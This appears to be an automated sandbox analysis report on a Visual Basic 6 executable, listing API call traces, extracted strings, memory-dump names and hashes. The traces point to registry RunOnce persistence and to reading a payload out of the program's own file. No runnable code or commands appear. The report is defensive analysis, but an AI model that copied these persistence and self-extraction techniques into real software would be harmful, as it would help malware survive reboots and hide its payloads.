Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A03C
Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0042A052
Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(0042A07C,?,?,?,00000000,Function_000032B6), ref: 0042A06C
Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A075

__vbaStrCat.MSVBVM60( RO,00000000,80000002,00000000,Start,00000004,80000002,00000000,Start,00000002,80000001,00000000,00000000,00000000), ref: 0040F95B
__vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0040F966
__vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0040F980
__vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0040F98B

Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7

__vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,00000000,Function_000032B6), ref: 0040F9A6
__vbaStrCat.MSVBVM60( RO,00000000,?,00000000,Function_000032B6), ref: 0040F9C2
__vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040F9CD
__vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,Function_000032B6), ref: 0040F9E6
__vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 0040F9F1
__vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,Function_000032B6), ref: 0040FA0C

Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9

Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80

#580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040FA7B
__vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040FAA3
__vbaStrMove.MSVBVM60 ref: 0040FAAE
__vbaFreeStr.MSVBVM60(00000000), ref: 0040FABD
__vbaCastObj.MSVBVM60(00000000,004077C4), ref: 0040FAD1
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040FADC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 0040FB0F
__vbaFreeObj.MSVBVM60 ref: 0040FB2A
__vbaNew.MSVBVM60(004075DC), ref: 0040FB3C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040FB47
__vbaHresultCheckObj.MSVBVM60(00000000,?,00406330,00000730), ref: 0040FB7A
__vbaFreeObj.MSVBVM60 ref: 0040FB95
__vbaStrCopy.MSVBVM60 ref: 0040FBC0
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040FBDA
__vbaStrCat.MSVBVM60(00000000), ref: 0040FBE1
#529.MSVBVM60(00000008), ref: 0040FBF5

Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88

Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(72A47559,00000000,00000000), ref: 00425A0A
Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3

Strings

Once, xrefs: 0040F97B, 0040F9E1
at , xrefs: 0040FC6F
, xrefs: 0040FEAD
Start, xrefs: 0040F914, 0040F933
MR, xrefs: 0040FA9E
O, xrefs: 0040502A
RO, xrefs: 0040F956, 0040F9BD

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$Copy$Error$ChkstkSystem$AnsiBstrUnicode$List$File$#525#529#570#580#648CheckHresultOpen$#616CastGet3Get4Seek
String ID: $ MR$ RO$O$Once$Start$at
API String ID: 3212910503-2307593978
Opcode ID: d7c645850be29222d1b7267b5b78ad533bfe0a9cf40cb1f2a83c7e80c5fd35d6
Instruction ID: 65a71e158419679981a83cfad656d767fba14ec0aa04879cc95e73d8581266b7
Opcode Fuzzy Hash: d7c645850be29222d1b7267b5b78ad533bfe0a9cf40cb1f2a83c7e80c5fd35d6
Instruction Fuzzy Hash: 8F020D75A00208EFDB14DFA0DE89BDE77B4FB48304F508169E505B72A1DB74AA45CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00429830, Relevance: 105.3, APIs: 57, Strings: 3, Instructions: 320COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CB91,00000000), ref: 0042984E
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042987B
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042988A
__vbaStrCat.MSVBVM60(00000000,?,?,?,?,00000000,004032B6), ref: 004298A3
__vbaStrMove.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 004298AE
__vbaStrCat.MSVBVM60(00000000,?,?,?,?,?,00000000,004032B6), ref: 004298C7
__vbaStrMove.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 004298D2
__vbaStrToAnsi.MSVBVM60(?,?,00000000,000F003F,?,?,?,?,?,?,00000000,004032B6), ref: 004298F2
__vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,?,?,00000000,004032B6), ref: 00429906
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,?,00000000,004032B6), ref: 00429914
__vbaFreeStr.MSVBVM60 ref: 0042992C
__vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00429962
__vbaSetSystemError.MSVBVM60(80000002,00000000), ref: 00429973
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00429981
__vbaFreeStr.MSVBVM60 ref: 0042998A
__vbaStrMove.MSVBVM60(?), ref: 004299B3
__vbaLenBstr.MSVBVM60(?), ref: 004299CA
__vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 004299D9
__vbaStrMove.MSVBVM60(00000000,00000001,00000000), ref: 004299EA
__vbaStrToAnsi.MSVBVM60(?,00000000), ref: 004299F5
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 00429A05
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00429A13
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00429A2F
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429A47
__vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,?,00000000,004032B6), ref: 00429A58
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429A66
__vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429A6F
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429A84
__vbaSetSystemError.MSVBVM60(80000001,00000000,?,?,?,?,00000000,004032B6), ref: 00429A95
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429AA3
__vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429AAC
__vbaStrCopy.MSVBVM60 ref: 0042999F

Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713

__vbaStrToAnsi.MSVBVM60(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00429ADB
__vbaSetSystemError.MSVBVM60(80000002,00000000), ref: 00429AEC
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00429AFA
__vbaFreeStr.MSVBVM60 ref: 00429B03
__vbaStrCopy.MSVBVM60 ref: 00429B18
__vbaStrMove.MSVBVM60(?), ref: 00429B2C
__vbaLenBstr.MSVBVM60(?), ref: 00429B43
__vbaStrToAnsi.MSVBVM60(?,?,00000000), ref: 00429B52
__vbaStrMove.MSVBVM60(00000000,00000001,00000000), ref: 00429B63
__vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00429B6E
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 00429B7E
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00429B8C
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00429BA8
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429BC0
__vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,?,00000000,004032B6), ref: 00429BD1
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 00429BDF
__vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429BE8
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 00429C3B
__vbaFreeStr.MSVBVM60(00429C84,?,?,?,?,00000000,004032B6), ref: 00429C6B
__vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429C74
__vbaFreeStr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00429C7D

Strings

X1@, xrefs: 004298C1
MGG, xrefs: 00429997
MGG, xrefs: 00429B10

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$AnsiError$System$MoveUnicode$BstrCopy$#516#631List$Chkstk
String ID: MGG$MGG$X1@
API String ID: 3619963569-3990769864
Opcode ID: 940beab17d9b24f9990cadcffc4ef0ae816e00d13d285cc8866c0fad8e1e78f3
Instruction ID: cadc88f3378a5b8a7e488d7ed3a86a3d9527093b9cfaa094389870ae1251132b
Opcode Fuzzy Hash: 940beab17d9b24f9990cadcffc4ef0ae816e00d13d285cc8866c0fad8e1e78f3
Instruction Fuzzy Hash: 93D1ABB1900109EFDB04EFE0EE99EDEBB79EF48305F108169F602B6160DB756945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004214E0, Relevance: 103.8, APIs: 69, Instructions: 297COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(?,00000000), ref: 0042153E
__vbaStrCopy.MSVBVM60(?,00000000), ref: 00421546
__vbaOnError.MSVBVM60(00000001,?,00000000), ref: 0042154A
#648.MSVBVM60(0000000A,?,00000000), ref: 00421562
__vbaFreeVar.MSVBVM60(?,00000000), ref: 00421571
__vbaI2I4.MSVBVM60(?,?,00000000), ref: 00421583
__vbaFileOpen.MSVBVM60(00000020,000000FF,00000000,?,00000000), ref: 0042158A
__vbaI2I4.MSVBVM60(?,00000000), ref: 00421592
#570.MSVBVM60(00000000,?,00000000), ref: 00421595
__vbaLenBstr.MSVBVM60(Function_0000545C,?,00000000), ref: 004215A2
__vbaLenBstr.MSVBVM60(Function_0000545C,?,00000000), ref: 004215C7
#525.MSVBVM60(00000000,?,00000000), ref: 004215CE
__vbaStrMove.MSVBVM60(?,00000000), ref: 004215D9
__vbaI2I4.MSVBVM60(?,00000000), ref: 004215E1
__vbaFileSeek.MSVBVM60(00000000,00000000,?,00000000), ref: 004215E5
__vbaI2I4.MSVBVM60(?,00000000), ref: 004215ED
__vbaGet3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 004215F6
__vbaStrMove.MSVBVM60(?,00000000,?,00000000), ref: 0042162F
__vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 00421632
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000), ref: 0042164F
__vbaI2I4.MSVBVM60(?,00000000), ref: 004217B1
__vbaFileClose.MSVBVM60(00000000,?,00000000), ref: 004217BA
__vbaI2I4.MSVBVM60(?,00000000), ref: 004217BE
__vbaPut3.MSVBVM60(00000004,?,00000000,?,00000000), ref: 004217C7
__vbaStrCopy.MSVBVM60(?,00000000), ref: 004217D5

Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE

__vbaStrMove.MSVBVM60(?,?,00000000), ref: 0042161E

Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877

__vbaStrCopy.MSVBVM60(?,00000000), ref: 00421604

Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713

__vbaI2I4.MSVBVM60(?,00000000), ref: 00421663
#570.MSVBVM60(00000000,?,00000000), ref: 00421666
__vbaI2I4.MSVBVM60(?,00000000), ref: 00421679
__vbaFileSeek.MSVBVM60(00000000,00000000,?,00000000), ref: 0042167D
#648.MSVBVM60(0000000A,?,00000000), ref: 00421695
__vbaFreeVar.MSVBVM60(?,00000000), ref: 004216A4
__vbaI2I4.MSVBVM60(?,?,00000000), ref: 004216B0
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?,00000000), ref: 004216BA
#525.MSVBVM60(00001000,?,00000000), ref: 004216C5
__vbaStrMove.MSVBVM60(?,00000000), ref: 004216D0
__vbaI2I4.MSVBVM60(?,00000000), ref: 004216D8
#570.MSVBVM60(00000000,?,00000000), ref: 004216DB
__vbaI2I4.MSVBVM60(?,00000000), ref: 00421712
__vbaGet3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0042171B
__vbaI2I4.MSVBVM60(?,00000000), ref: 00421723
__vbaPut3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0042172C
#598.MSVBVM60(?,00000000), ref: 00421744
#525.MSVBVM60(-00000001,?,00000000), ref: 00421764
__vbaStrMove.MSVBVM60(?,00000000), ref: 0042176F
__vbaI2I4.MSVBVM60(?,00000000), ref: 00421777
__vbaGet3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 00421780
__vbaI2I4.MSVBVM60(?,00000000), ref: 00421788
__vbaPut3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 00421791
#598.MSVBVM60(?,00000000), ref: 0042179E
__vbaStrMove.MSVBVM60(?,?,00000000), ref: 004217E9

Part of subcall function 00411210: #594.MSVBVM60(?,72A21A08,-00000001,72A26C30), ref: 0041127A
Part of subcall function 00411210: __vbaFreeVar.MSVBVM60 ref: 00411283
Part of subcall function 00411210: __vbaLenBstr.MSVBVM60 ref: 0041128F
Part of subcall function 00411210: #631.MSVBVM60(?,?,0000000A), ref: 004112C8
Part of subcall function 00411210: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
Part of subcall function 00411210: #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
Part of subcall function 00411210: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
Part of subcall function 00411210: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2

__vbaStrMove.MSVBVM60(?,?,00000000), ref: 004217FD
__vbaI2I4.MSVBVM60(?,00000000), ref: 00421805
__vbaPut3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0042180E
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000), ref: 00421822
__vbaI2I4.MSVBVM60 ref: 0042182D
__vbaFileClose.MSVBVM60(00000000), ref: 00421830
__vbaExitProc.MSVBVM60 ref: 00421839
__vbaI2I4.MSVBVM60 ref: 0042184F
__vbaFileClose.MSVBVM60(00000000), ref: 00421858
__vbaI2I4.MSVBVM60 ref: 0042185D
__vbaFileClose.MSVBVM60(00000000), ref: 00421860
__vbaExitProc.MSVBVM60 ref: 00421869
__vbaFreeStr.MSVBVM60(004218B2), ref: 004218A0
__vbaFreeStr.MSVBVM60 ref: 004218A5
__vbaFreeStr.MSVBVM60 ref: 004218AA
__vbaFreeStr.MSVBVM60 ref: 004218AF
__vbaErrorOverflow.MSVBVM60(?,00000000), ref: 004218C9

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$File$Copy$#516#631BstrClosePut3$#525#570Get3$#598#648ErrorExitListOpenProcSeek$#537#594Overflow
String ID:
API String ID: 936154001-0
Opcode ID: 3aa9f9ede1c026c034044edf61044cbf9f29f764a31bed732f8cbd30b78298b1
Instruction ID: 6fbf1135f095249bf70c03af9044da0b22cab9efce2ca8aeaf0a64a19547a855
Opcode Fuzzy Hash: 3aa9f9ede1c026c034044edf61044cbf9f29f764a31bed732f8cbd30b78298b1
Instruction Fuzzy Hash: B7B11B75E002589FCB04EFE4DE88AEEBBB9EF48341F10412AE506E72A4DB785945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBF0, Relevance: 91.4, APIs: 49, Strings: 3, Instructions: 401COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0040DC0E
__vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,?,?,?,Function_000032B6), ref: 0040DC57
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 0040DC66
__vbaSetSystemError.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DC7E
__vbaSetSystemError.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DCA8
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 0040DCD1

Part of subcall function 00429F50: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00429F6E
Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429F9B
Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FA7
Part of subcall function 00429F50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00429FB6
Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429FCF
Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 00429FDF
Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00429FED
Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FF6
Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,00403208,00000004,?,?,?,00000000,Function_000032B6), ref: 0042A015
Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0042A025
Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0042A033
Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A03C
Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0042A052
Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(0042A07C,?,?,?,00000000,Function_000032B6), ref: 0042A06C
Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A075

